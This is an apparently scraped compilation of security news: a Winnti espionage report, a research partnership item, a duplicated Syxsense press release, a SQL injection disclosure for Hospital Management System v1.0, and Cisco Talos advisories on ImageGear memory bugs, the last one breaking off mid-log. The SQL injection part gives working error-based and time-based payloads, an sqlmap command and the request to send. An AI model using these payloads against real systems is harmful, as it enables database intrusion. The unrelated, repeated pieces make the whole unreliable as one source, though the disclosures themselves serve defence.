An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019.
Dubbed "Operation CuckooBees" by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information.
Targets included technology and

An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019.

Dubbed "**Operation CuckooBees**" by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information.

Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America.

"The attackers targeted intellectual property developed by the victims, including sensitive documents, blueprints, diagrams, formulas, and manufacturing-related proprietary data," the researchers said.

"In addition, the attackers collected information that could be used for future cyberattacks, such as details about the target company's business units, network architecture, user accounts and credentials, employee emails, and customer data."

Winnti, also tracked by other cybersecurity vendors under the names APT41, Axiom, Barium, and Bronze Atlas, is known to be active since at least 2007.

"The group's intent is towards theft of intellectual property from organizations in developed economies, and with moderate confidence that this is on behalf of China to support decision making in a range of Chinese economic sectors," Secureworks notes in a threat profile of the actor.

The multi-phased infection chain documented by Cybereason involves the exploitation of internet-facing servers to deploy a web shell with the goal of conducting reconnaissance, lateral movement, and data exfiltration activities.

It's both complex and intricate, following a "house of cards" approach in that each component of the killchain depends on other modules in order to function, rendering analysis exceedingly difficult.

"This demonstrates the thought and effort that was put into both the malware and operational security considerations, making it almost impossible to analyze unless all pieces of the puzzle are assembled in the correct order," the researchers explained.

The data harvesting is facilitated by means of a modular loader called Spyder, which is used to decrypt and load additional payloads. Also used are four different payloads — STASHLOG, SPARKLOG, PRIVATELOG, and DEPLOYLOG — that are sequentially deployed to drop the WINNKIT, a kernel-level rootkit.

Crucial to the stealthiness of the campaign is the use of "rarely seen" techniques such as the abuse of Windows Common Log File System (CLFS) mechanism to stash the payloads, enabling the hacking group to conceal their payloads and evade detection by traditional security products.

Interestingly, parts of the attack sequence were previously detailed by Mandiant in September 2021, while pointing out the misuse of CLFS to hide second-stage payloads in an attempt to circumvent detection.

The cybersecurity firm attributed the malware to an unknown actor, but cautioned that it could have been deployed as part of a highly targeted activity.

"Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files," Mandiant said at the time. "This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions."

WINNKIT, for its part, has a compilation timestamp of May 2019 and has almost zero detection rate in VirusTotal, highlighting the evasive nature of the malware that enabled the authors to stay undiscovered for years.

The ultimate goal of the intrusions, the researchers assessed, is to siphon proprietary information, research documents, source code, and blueprints for various technologies.

"Winnti is one of the most industrious groups operating on behalf of Chinese state-aligned interests," Cybereason said. "The threat \[actor\] employed an elaborate, multi-stage infection chain that was critical to enabling the group to remain undetected for so long."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies

The security research partnership will focus on developing new techniques and releasing them as open source.

Aryaka and CyLab, Carnegie Mellon University’s Security and Privacy Institute, announced a strategic partnership to research new threat mitigation techniques and develop new enterprise networking and security solutions.

Under the partnership, Aryaka will provide funding and industry experts to assist more than 100 faculty members and 100 graduate students with research to identify, prioritize, and develop threat mitigation techniques. The hope is to make these techniques available as open source to help enterprises and security vendors to better defend against cyberattacks, CyLab’s Daniel Tkacik wrote.

The modern IT landscape is very different from when users were in offices and applications were in data centers, said Renuka Nadkarni, Aryaka’s chief product officer. Applications are now anywhere and users can access those applications regardless of their geographic location. Security needs to be reconsidered in the case of the application and not the network.

Aryaka is also the founding sponsor of CyLab’s Future Enterprise Security Initiative, a multi-disciplinary approach to making complex security solutions available and accessible. The initiative’s mission is to rethink “security across enterprise ecosystems through innovations in artificial intelligence, computer science, engineering, and human factors research,” Tkacik wrote.

Founded in 2003, CyLab is a public/private collaborative computer security and privacy research institute and is one of the largest security research centers in the US. Aryaka decided to partner with CyLab because of the university’s work in artificial intelligence and machine learning as well as in other fields such as humanities, psychology, and policy, said David Ginsburg, Aaryaka’s VP of product and solutions marketing. A multi-disciplinary approach gives researchers the opportunity to look at problems not just from the technology point of view, but to also consider attacker motivations and intent.

Aryaka will guide research topics, offer industry expertise, provide data sets for building AI models, and give feedback on techniques being developed.

Aryaka, Carnegie Mellon’s CyLab to Research New Threat Mitigation Techniques

IT Teams can now manage, detect, and secure all endpoints with 100% visibility across desktop, laptop, server, and mobile devices.

  
ALISO VIEJO, Calif. – \[May 3, 2022\] – Syxsense, a global leader in IT and security management solutions, today announced Syxsense Enterprise™, the world’s first IT management and endpoint security solution that delivers real-time vulnerability monitoring and instant remediation for every endpoint across an organization’s entire network environment. Syxsense Enterprise combines Syxsense Secure, Manage, and Mobile Device Manager to deliver a completely unified platform that scans and manages all endpoints, resolves problems in real-time, and reduces the risks associated with system misconfigurations. This enables organizations to better predict, identify, and remediate vulnerabilities.

“As threats get more complex, it’s important that IT teams have consolidated solutions for IT management and endpoint security. Syxsense Enterprise is designed to give them a centralized cloud-based platform for scanning, patching, recognizing, and remediating vulnerabilities that could lead to attack or exploitation of endpoints,” said Ashley Leonard, Founder and CEO at Syxsense. “By offering our customers a unified cloud solution, we enable complete control over every endpoint device on the network so they can secure business-critical resources quickly and streamline security operations.”

Syxsense Enterprise is the industry’s first Unified Security and Endpoint Management (USEM) solution that addresses the three key elements of endpoint security – vulnerabilities, patch, and compliance. It layers on a powerful workflow automation tool called Syxsense Cortex™ that remediates and eliminates endpoint security weaknesses – all through a single cloud-based, drag and drop management interface, with hundreds of prebuilt workflows. This includes the ability to identify software vulnerabilities in both OS and 3rd party applications, misconfigurations from open ports, disabled firewalls, ineffective user account polices and more.

It also includes Syxsense’s recently launched Mobile Device Management (MDM) solution, which allows IT to manage devices running on iOS, iPadOS, and Android, in addition to previously supported Windows, Linux and Mac environments. Syxsense MDM includes all the tools necessary for Device Enrollment, Inventory and Configuration Management, Application Deployment and Rollback, Data Containerization, and Remote Device Lock/Reset/Wipe (making it possible for IT to wipe sensitive data from lost or stolen devices).

“As the market shifts to a hybrid workforce, the number of endpoints is growing exponentially, with corporate network connected mobile endpoints soaring,” said Charles Kolodgy, principal at advisory firm Security Mindsets. “The need to manage and secure an increasing number of endpoints, including desktops, mobile phones and other devices, is becoming more apparent every day as sophisticated threats grow exponentially. Syxsense Enterprise is offering a solution that solves the need to both secure and manage a vast collection of endpoints. The key is the ability to scan for vulnerabilities and patch without losing business continuity.”

The key features of Syxsense Enterprise include:

Vulnerability Scanning – Prevent cyberattacks by identifying scanning authorization issues, security implementation problems, and antivirus status.

Patch Everything – Automatically deploy OS and third-party patches to remediate all endpoint vulnerabilities inside the network and on roaming devices outside the network.

Prove Compliance and Device Health – Document patching with reporting for risk assessments, vulnerable devices, task summaries and more. And scan and prioritize patching relative to risk exposure.

Quarantine Devices – Block communication for an infected device, isolate endpoints, and kill malicious processes before they impact the network.

Control All Mobile Devices – Oversee devices remotely, silently push OTA configurations, applications, and policies from iOS to Android to Windows and more.

Collaborate with Ease – IT and security teams can now collaborate in a single console to identify and close endpoint attack vectors quickly.

For more details or to schedule a demo, visit: https://www.syxsense.com/gc-demo-syxsense

**About Syxsense**

Syxsense is a leading provider of innovative, intuitive endpoint security and management technology that combines the power of artificial intelligence with industry expertise to help customers predict and remove security threats across all devices including mobile. Syxsense is the first unified security and endpoint management platform that centralizes the three key elements of endpoint security management (vulnerabilities, patch and compliance) and layers on a powerful workflow automation tool called Syxsense Cortex,™ all through a single cloud-based platform, enabling greater efficiency and collaboration between teams. The always-on technology performs in real-time so businesses can operate free of disruption from security breaches that cripple productivity and expose them to financial risk and reputational harm. For more information, visit www.syxsense.com

Syxsense Enterprise Unifies Endpoint Security and IT Management for Real-Time Vulnerability Monitoring and Remediation

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the adminname parameter in admin.php.

****Hospital-Management-System v1.0 - SQLi******Vendor**

**Description:**

The vulnerability page is admin.php

http://you ip/HMS/admin.php

Hospital-Management-System v1.0

The adminname parameter in the admin.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

python3 sqlmap.py -r Your post packet.txt --random-agent --risk=3 --level=3 -dbs

\[+\] Payloads:

    Parameter: adminname ((custom) POST)
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
        Payload: adminname=admin' AND EXTRACTVALUE(4756,CONCAT(0x5c,0x717a706a71,(SELECT (ELT(4756=4756,1))),0x7170707a71)) AND 'hOiE'='hOiE&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=admin' AND (SELECT 3117 FROM (SELECT(SLEEP(5)))xtHJ) AND 'beHE'='beHE&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    ---
    

\[+\]Post request package

    POST /HMS/admin.php HTTP/1.1
    Host: 192.168.10.7
    Content-Length: 119
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.10.7
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.10.7/HMS/admin.php
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    adminname=admin1&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    
    

**In action:**

**Proof and Exploit:**

href

CVE-2022-27413: GitHub - HH1F/Hospital-Management-System-V1.0-SQLi

Syxsense Enterprise delivers real-time vulnerability monitoring and remediation for all endpoints across an organization’s entire network.

**ALISO VIEJO, Calif**. – \[May 3, 2022\] – Syxsense, a global leader in IT and security management solutions, today announced Syxsense Enterprise™, the world’s first IT management and endpoint security solution that delivers real-time vulnerability monitoring and instant remediation for every endpoint across an organization’s entire network environment. Syxsense Enterprise combines Syxsense Secure, Manage, and Mobile Device Manager to deliver a completely unified platform that scans and manages all endpoints, resolves problems in real-time, and reduces the risks associated with system misconfigurations. This enables organizations to better predict, identify, and remediate vulnerabilities.

“As threats get more complex, it’s important that IT teams have consolidated solutions for IT management and endpoint security. Syxsense Enterprise is designed to give them a centralized cloud-based platform for scanning, patching, recognizing, and remediating vulnerabilities that could lead to attack or exploitation of endpoints,” said Ashley Leonard, Founder and CEO at Syxsense. “By offering our customers a unified cloud solution, we enable complete control over every endpoint device on the network so they can secure business-critical resources quickly and streamline security operations.”

Syxsense Enterprise is the industry’s first Unified Security and Endpoint Management (USEM) solution that addresses the three key elements of endpoint security – vulnerabilities, patch, and compliance. It layers on a powerful workflow automation tool called Syxsense Cortex™ that remediates and eliminates endpoint security weaknesses – all through a single cloud-based, drag and drop management interface, with hundreds of prebuilt workflows. This includes the ability to identify software vulnerabilities in both OS and 3rd party applications, misconfigurations from open ports, disabled firewalls, ineffective user account polices and more. 

It also includes Syxsense’s recently launched Mobile Device Management (MDM) solution, which allows IT to manage devices running on iOS, iPadOS, and Android, in addition to previously supported Windows, Linux and Mac environments. Syxsense MDM includes all the tools necessary for Device Enrollment, Inventory and Configuration Management, Application Deployment and Rollback, Data Containerization, and Remote Device Lock/Reset/Wipe (making it possible for IT to wipe sensitive data from lost or stolen devices). 

“As the market shifts to a hybrid workforce, the number of endpoints is growing exponentially, with corporate network connected mobile endpoints soaring,” said Charles Kolodgy, principal at advisory firm Security Mindsets. “The need to manage and secure an increasing number of endpoints, including desktops, mobile phones and other devices, is becoming more apparent every day as sophisticated threats grow exponentially. Syxsense Enterprise is offering a solution that solves the need to both secure and manage a vast collection of endpoints. The key is the ability to scan for vulnerabilities and patch without losing business continuity.”

The key features of Syxsense Enterprise include:

*   Vulnerability Scanning – Prevent cyberattacks by identifying scanning authorization issues, security implementation problems, and antivirus status. 
*   Patch Everything – Automatically deploy OS and third-party patches to remediate all endpoint vulnerabilities inside the network and on roaming devices outside the network.
*   Prove Compliance and Device Health – Document patching with reporting for risk assessments, vulnerable devices, task summaries and more. And scan and prioritize patching relative to risk exposure.
*   Quarantine Devices – Block communication for an infected device, isolate endpoints, and kill malicious processes before they impact the network. 
*   Control All Mobile Devices – Oversee devices remotely, silently push OTA configurations, applications, and policies from iOS to Android to Windows and more.
*   Collaborate with Ease – IT and security teams can now collaborate in a single console to identify and close endpoint attack vectors quickly. 

For more details or to schedule a demo, visit: https://www.syxsense.com/gc-demo-syxsense

**About Syxsense**

Syxsense is a leading provider of innovative, intuitive endpoint security and management technology that combines the power of artificial intelligence with industry expertise to help customers predict and remove security threats across all devices including mobile. Syxsense is the first unified security and endpoint management platform that centralizes the three key elements of endpoint security management (vulnerabilities, patch and compliance) and layers on a powerful workflow automation tool called Syxsense Cortex,™ all through a single cloud-based platform, enabling greater efficiency and collaboration between teams. The always-on technology performs in real-time so businesses can operate free of disruption from security breaches that cripple productivity and expose them to financial risk and reputational harm. For more information, visit www.syxse

Syxsense Launches Unified Endpoint Security and Management Platform

A stack-based buffer overflow vulnerability exists in the IGXMPXMLParser::parseDelimiter functionality of Accusoft ImageGear 19.10. A specially-crafted PSD file can overflow a stack buffer, which could either lead to denial of service or, depending on the application, to an information leak. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

A stack-based buffer overflow vulnerability exists in the IGXMPXMLParser::parseDelimiter functionality of Accusoft ImageGear 19.10. A specially-crafted PSD file can overflow a stack buffer, which could either lead to denial of service or, depending on the application, to an information leak. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

Accusoft ImageGear 19.10

**Product URLs**

ImageGear - https://www.accusoft.com/products/imagegear-collection/

**CVSSv3 Score**

7.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

**CWE**

CWE-193 - Off-by-one Error

**Details**

The ImageGear library is a document-imaging developer toolkit that offers image conversion, creation, editing, annotation and more. It supports more than 100 formats such as DICOM, PDF, Microsoft Office and others.

Trying to load a malformed PSD file, we end up with the following situation:

    (758.8fc): C++ EH exception - code e06d7363 (first chance)
    ModLoad: 75590000 75610000   C:\Windows\SysWOW64\uxtheme.dll
    
    STATUS_STACK_BUFFER_OVERRUN encountered
    (758.8fc): Break instruction exception - code 80000003 (first chance)
    eax=00000000 ebx=711732c8 ecx=76ae01c0 edx=0018ea2d esi=00000000 edi=000039ac
    eip=76adffa1 esp=0018ec74 ebp=0018ecf0 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    kernel32!UnhandledExceptionFilter+0x5f:
    76adffa1 cc              int     3
    

This kind of error STATUS_STACK_BUFFER_OVERRUN indicates an abnormal program termination. Looking at the call stack may indicate the culprit.

    0:000> kb
    ChildEBP RetAddr  Args to Child              
    0018ecf0 71ace2d9 711732c8 0018ed0c 7110c698 kernel32!UnhandledExceptionFilter+0x5f
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Talos Vrt Team\ImageGearFuzzing\bin\igCore19d.dll - 
    0018ecfc 7110c698 711732c8 00000001 0018f03c MSVCR110!__crtUnhandledException+0x14
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0018ed0c 7110c7af 711732c8 029c02d0 029c95e0 igCore19d!IG_GUI_page_title_set+0x3c5e8
    0018f03c 71089a04 029c76bd 029c3f8a 4848482f igCore19d!IG_GUI_page_title_set+0x3c6ff
    0018f150 7108950c 029c0150 0018f1e8 029c0348 igCore19d!IG_mpi_page_set+0x12d9d4
    0018f16c 7108966f 029c765d 000039ac 00000001 igCore19d!IG_mpi_page_set+0x12d4dc
    0018f1b8 7109003d 0018fc54 029c0150 00000000 igCore19d!IG_mpi_page_set+0x12d63f
    0018f670 7104cd0b 0018fc54 1000001e 029c0348 igCore19d!IG_mpi_page_set+0x13400d
    0018f738 7104c242 0018fc54 1000001e 029c0098 igCore19d!IG_mpi_page_set+0xf0cdb
    0018f774 7104bcba 0018fc54 0018f79c 0018f7c4 igCore19d!IG_mpi_page_set+0xf0212
    0018fbcc 70f313d9 0018fc54 029c0060 00000001 igCore19d!IG_mpi_page_set+0xefc8a
    0018fc04 70f708d7 00000000 029c0060 0018fc54 igCore19d!IG_image_savelist_get+0xb29
    0018fe80 70f70239 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0018fea0 70f05757 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x14209
    *** WARNING: Unable to verify checksum for Fuzzme.exe
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for Fuzzme.exe - 
    0018fec0 00402219 00308230 0018fed4 00000001 igCore19d!IG_load_file+0x47
    0018fed8 00402524 00308230 0018ff10 003079a8 Fuzzme!fuzzme+0x19
    0018ff40 0040668d 00000005 003066a8 003079a8 Fuzzme!fuzzme+0x324
    0018ff88 76aa33ca 7efde000 0018ffd4 77d19ed2 Fuzzme!fuzzme+0x448d
    0018ff94 77d19ed2 7efde000 7741e483 00000000 kernel32!BaseThreadInitThunk+0xe
    0018ffd4 77d19ea5 00406715 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
    0018ffec 00000000 00406715 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b
    

Investigating the callback stack leads us to the function pointed by igCore19d!IG_mpi_page_set+0x12d9d4, which points to the end to the following pseudo code function at LINE165 pointed by the call to security_check_cookie :

    LINE1   void __thiscall IGXMPXMLParser::FUN_74239720(IGXMPXMLParser *this)
    LINE2   {
    LINE3     char cVar1;
    LINE4     void *pvVar2;
    LINE5     code *pcVar3;
    LINE6     bool bVar4;
    LINE7     int iVar5;
    LINE8     int iVar6;
    LINE9     char *pcVar7;
    LINE10    char *pcVar8;
    LINE11    char *pcVar9;
    LINE12    char *local_10c;
    LINE13    char buffer_ovw [256];
    LINE14    uint stack_canary;
    LINE15    
    LINE16    stack_canary = DAT_7435cea8 ^ (uint)&stack0xfffffffc;
    LINE17    pcVar7 = this->field2_0x8;
    LINE18    pcVar9 = pcVar7 + this->field3_0xc;
    LINE19    bVar4 = false;
    LINE20    this->field10_0x1c = pcVar7;
    LINE21    pcVar8 = pcVar7;
    LINE22    while (pcVar8 < pcVar9) {
    LINE23      cVar1 = *(char *)this->field10_0x1c;
    [...]
    LINE48      else if (cVar1 == '<') {
    [...]
    LINE91                      /* ---------------------------------------------------------------------------
    LINE92                          */
    LINE93        iVar5 = parseDelimiter(this,(char (*) [256])buffer_ovw);
    LINE94                      /* ---------------------------------------------------------------------------
    LINE95                          */
    [...]
    LINE161     this->field10_0x1c = this->field10_0x1c + 1;
    LINE162     pcVar8 = (char *)this->field10_0x1c;
    LINE163   }
    LINE165   security_check_cookie(stack_canary ^ (uint)&stack0xfffffffc);
    LINE166   return;
    LINE167 }
    

So this indicates to us that somehow the stack_canary declared at LINE14, which is initialized LINE16, has been overwritten along the flow of this function. After investigation, it appears the stack_canary is overwritten during the call to the parseDelimiter at LINE93, which takes as a parameter the variable buffer_ovw declared at LINE13 just before the stack_canary.

Below is the parseDelimiter pseudo-code:

    LINE168 void __thiscall IGXMPXMLParser::parseDelimiter(IGXMPXMLParser *this,char (*buffer_ovw) [256])
    LINE169 {
    LINE170   bool bVar1;
    LINE171   int *piVar2;
    LINE172   char (*target_buffer) [256];
    LINE173   int index;
    LINE174   bool bVar3;
    LINE175   int local_410;
    LINE176   int local_40c;
    LINE177   char string_buffer [1024];
    LINE178   uint stack_cookie;
    LINE179   
    LINE180   stack_cookie = DAT_7435cea8 ^ (uint)&stack0xfffffffc;
    LINE181   index = 0;
    LINE182   bVar1 = false;
    LINE183   bVar3 = *(char *)this->field10_0x1c == '/';
    LINE184   if (bVar3) {
    LINE185     (*buffer_ovw)[0] = '/';
    LINE186     this->field10_0x1c = this->field10_0x1c + 1;
    LINE187   }
    LINE188   target_buffer = (char (*) [256])(*buffer_ovw + bVar3);
    LINE189   while (index < 256) {
    LINE190     switch(*(char *)this->field10_0x1c) {
    LINE191     case '\t':
    LINE192     case '\n':
    LINE193     case '\r':
    LINE194     case ' ':
    LINE195     case '/':
    LINE196     case '>':
    LINE197       *(char *)target_buffer = '\0';
    LINE198       this->field10_0x1c = this->field10_0x1c + -1;
    LINE199       bVar1 = true;
    LINE200       break;
    LINE201     default:
    LINE202       *(char *)target_buffer = *(char *)this->field10_0x1c;
    LINE203       target_buffer = (char (*) [256])((int)target_buffer + 1);
    LINE204       index = index + 1;
    LINE205     }
    LINE206     this->field10_0x1c = this->field10_0x1c + 1;
    LINE207     if (bVar1) {
    LINE208       security_check_cookie(stack_cookie ^ (uint)&stack0xfffffffc);
    LINE209       return;
    LINE210     }
    LINE211   }
    LINE212   if (this->field21_0x50 != 0) {
    LINE213     index = this->field31_0x78;
    LINE214     local_40c = this->field10_0x1c - (int)this->field2_0x8;
    LINE215     local_410 = 0;
    LINE216     if (0 < index) {
    LINE217       piVar2 = (int *)this->field30_0x74;
    LINE218       do {
    LINE219         if (local_40c < *piVar2) break;
    LINE220         local_410 = local_410 + 1;
    LINE221         piVar2 = piVar2 + 1;
    LINE222       } while (local_410 < index);
    LINE223     }
    LINE224     if (local_410 < index) {
    LINE225       local_40c = *(int *)((int)this->field30_0x74 + local_410 * 4) - local_40c;
    LINE226     }
    LINE227     else {
    LINE228       local_40c = 0;
    LINE229     }
    LINE230     if (this->field38_0x88 == 2) {
    LINE231       local_40c = local_40c * 2;
    LINE232     }
    LINE233     strncpy(string_buffer,"Tag name exceed max character count",0x400);
    LINE234     (*(code *)this->field21_0x50)
    LINE235               (this,"C:\\BuildAgent\\work\\76e9801d497051a9\\Source\\Common\\Inc_prv\\xmlparser.cpp"
    LINE236                ,0x12f,&local_410);
    LINE237   }
    LINE238   security_check_cookie(stack_cookie ^ (uint)&stack0xfffffffc);
    LINE239   return;
    LINE240 }
    

Looking through the parameter buffer_ovw, we can observe the code is impacting the table in two places: LINE185 and LINE188. In LINE185, we see it depends on the boolean variable bVar3, which is set to true when some specific char is found in LINE183. The side effect of this boolean check isthat it impacts the shift to the start of target_buffer LINE188, as it’s added to buffer_ovw by one byte.  
We observe then a while loop starting LINE189 with a hardcoded constant of 256, which is supposed to prevent the overflow of the destination buffer buffer_ovw.  
But the code is not taking into account the boolean positive result shift and overflows the buffer_ovw if the default case is observed for more than 256 bytes.

The condition to make this happen depends on the PSD file records contained, identified as XMP metadata.  
This leads to a denial-of-service caused by the security_check_cookie. However, depending on how the Imagegear SDK is employed in an application, this could also lead to leaking 1 byte from the canary.

**Crash Information**

    0:000> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
    
    FAULTING_IP: 
    kernel32!UnhandledExceptionFilter+5f
    76adffa1 cc              int     3
    
    EXCEPTION_RECORD:  711ae3e0 -- (.exr 0x711ae3e0)
    ExceptionAddress: 71089a04 (igCore19d!IG_mpi_page_set+0x0012d9d4)
       ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
      ExceptionFlags: 00000001
    NumberParameters: 1
       Parameter[0]: 00000002
    
    CONTEXT:  711ae430 -- (.cxr 0x711ae430;r)
    eax=00000000 ebx=029c0150 ecx=8a712c18 edx=00000100 esi=000000a1 edi=000039ac
    eip=71089a04 esp=0018f044 ebp=0018f150 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    igCore19d!IG_mpi_page_set+0x12d9d4:
    71089a04 8be5            mov     esp,ebp
    Last set context:
    eax=00000000 ebx=029c0150 ecx=8a712c18 edx=00000100 esi=000000a1 edi=000039ac
    eip=71089a04 esp=0018f044 ebp=0018f150 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    igCore19d!IG_mpi_page_set+0x12d9d4:
    71089a04 8be5            mov     esp,ebp
    Resetting default scope
    
    FAULTING_THREAD:  000008fc
    
    PROCESS_NAME:  Fuzzme.exe
    
    ERROR_CODE: (NTSTATUS) 0x80000003 - {EXCEPTION}  Breakpoint  A breakpoint has been reached.
    
    EXCEPTION_CODE: (HRESULT) 0x80000003 (2147483651) - One or more arguments are invalid
    
    EXCEPTION_PARAMETER1:  00000000
    
    NTGLOBALFLAG:  470
    
    APPLICATION_VERIFIER_FLAGS:  0
    
    APP:  fuzzme.exe
    
    ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre
    
    BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME
    
    PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN
    
    DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN
    
    LAST_CONTROL_TRANSFER:  from 7108950c to 71089a04
    
    STACK_TEXT:  
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0018f150 7108950c 029c0150 0018f1e8 029c0348 igCore19d!IG_mpi_page_set+0x12d9d4
    0018f16c 7108966f 029c765d 000039ac 00000001 igCore19d!IG_mpi_page_set+0x12d4dc
    0018f1b8 7109003d 0018fc54 029c0150 00000000 igCore19d!IG_mpi_page_set+0x12d63f
    0018f670 7104cd0b 0018fc54 1000001e 029c0348 igCore19d!IG_mpi_page_set+0x13400d
    0018f738 7104c242 0018fc54 1000001e 029c0098 igCore19d!IG_mpi_page_set+0xf0cdb
    0018f774 7104bcba 0018fc54 0018f79c 0018f7c4 igCore19d!IG_mpi_page_set+0xf0212
    0018fbcc 70f313d9 0018fc54 029c0060 00000001 igCore19d!IG_mpi_page_set+0xefc8a
    0018fc04 70f708d7 00000000 029c0060 0018fc54 igCore19d!IG_image_savelist_get+0xb29
    0018fe80 70f70239 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0018fea0 70f05757 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x14209
    0018fec0 00402219 00308230 0018fed4 00000001 igCore19d!IG_load_file+0x47
    0018fed8 00402524 00308230 0018ff10 003079a8 Fuzzme!fuzzme+0x19
    0018ff40 0040668d 00000005 003066a8 003079a8 Fuzzme!fuzzme+0x324
    0018ff88 76aa33ca 7efde000 0018ffd4 77d19ed2 Fuzzme!fuzzme+0x448d
    0018ff94 77d19ed2 7efde000 7741e483 00000000 kernel32!BaseThreadInitThunk+0xe
    0018ffd4 77d19ea5 00406715 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
    0018ffec 00000000 00406715 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b
    
    
    FOLLOWUP_IP: 
    igCore19d!IG_mpi_page_set+12d9d4
    71089a04 8be5            mov     esp,ebp
    
    SYMBOL_STACK_INDEX:  0
    
    SYMBOL_NAME:  igcore19d!IG_mpi_page_set+12d9d4
    
    FOLLOWUP_NAME:  MachineOwner
    
    MODULE_NAME: igCore19d
    
    IMAGE_NAME:  igCore19d.dll
    
    DEBUG_FLR_IMAGE_TIMESTAMP:  60aceda9
    
    STACK_COMMAND:  .cxr 0x711ae430 ; kb
    
    FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_80000003_igCore19d.dll!IG_mpi_page_set
    
    BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_MISSING_GSFRAME_igcore19d!IG_mpi_page_set+12d9d4
    
    ANALYSIS_SOURCE:  UM
    
    FAILURE_ID_HASH_STRING:  um:stack_buffer_overrun_80000003_igcore19d.dll!ig_mpi_page_set
    
    FAILURE_ID_HASH:  {e0459bbd-9052-42e3-75ad-df79bbfa6dcb}
    
    Followup: MachineOwner
    ---------
    

**Vendor Response**

ImageGear Pro v20.0 release

Windows: https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe Linux: https://download.accusoft.com/imagegear/pro/unix/ImageGear\_for\_C\_Cpp20.0.0-Linux64.tar.gz

Documentation Windows: http://help.accusoft.com/ImageGear/v20.0/Windows/DLL/webframe.html Linux: http://help.accusoft.com/ImageGear/v20.0/Linux/webframe.html

https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe

**Timeline**

2022-02-07 - Vendor disclosure  
2022-04-29 - Vendor patched  
2022-05-02 - Public Release  

Discovered by Emmanuel Tacheau of Cisco Talos.

CVE-2022-23400: TALOS-2022-1465 || Cisco Talos Intelligence Group

A memory corruption vulnerability exists in the ioca_mys_rgb_allocate functionality of Accusoft ImageGear 19.10. A specially-crafted malformed file can lead to an arbitrary free. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

A memory corruption vulnerability exists in the ioca\_mys\_rgb\_allocate functionality of Accusoft ImageGear 19.10. A specially-crafted malformed file can lead to an arbitrary free. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

Accusoft ImageGear 19.10

**Product URLs**

ImageGear - https://www.accusoft.com/products/imagegear-collection/

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-131 - Incorrect Calculation of Buffer Size

**Details**

The ImageGear library is a document-imaging developer toolkit that offers image conversion, creation, editing, annotation and more. It supports more than 100 formats such as DICOM, PDF, Microsoft Office and others.

Trying to load a malformed IOCA file, we end up with the following situation:

    (1bf4.175c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8:
